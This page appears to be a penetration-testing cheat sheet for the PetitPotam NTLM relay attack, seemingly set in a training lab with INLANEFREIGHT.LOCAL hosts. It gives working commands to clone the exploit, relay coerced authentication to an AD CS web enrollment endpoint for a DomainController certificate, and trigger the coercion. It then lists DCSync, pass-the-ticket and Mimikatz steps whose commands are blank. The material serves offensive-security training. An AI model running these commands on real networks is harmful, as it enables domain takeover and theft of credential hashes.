PetitPotam
PetitPotam is an NTLM relay attack that forces authentication from a Windows server, which can then be exploited to gain privileged access to a domain controller.
1. Clone PetitPotam Exploit Repository
Command:
git clone https://github.com/topotam/PetitPotam.git2. Set Up NTLM Relay Attack
Command:
sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMYEA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController3. Execute PetitPotam Attack
Command:
python3 PetitPotam.py 172.16.5.225 172.16.5.54. Request TGT Ticket for Domain Controller
Command:
5. Perform DCSync Attack to Extract NTLM Hashes
Command:
6. View Contents of CCache File
Command:
7. Extract NT Hash from Ticket
Command:
8. Extract Hashes Using DCSync Attack
Command:
9. Perform Pass-the-Ticket Attack with Rubeus
Command:
10. Perform DCSync Attack Using Mimikatz
Command:
Last updated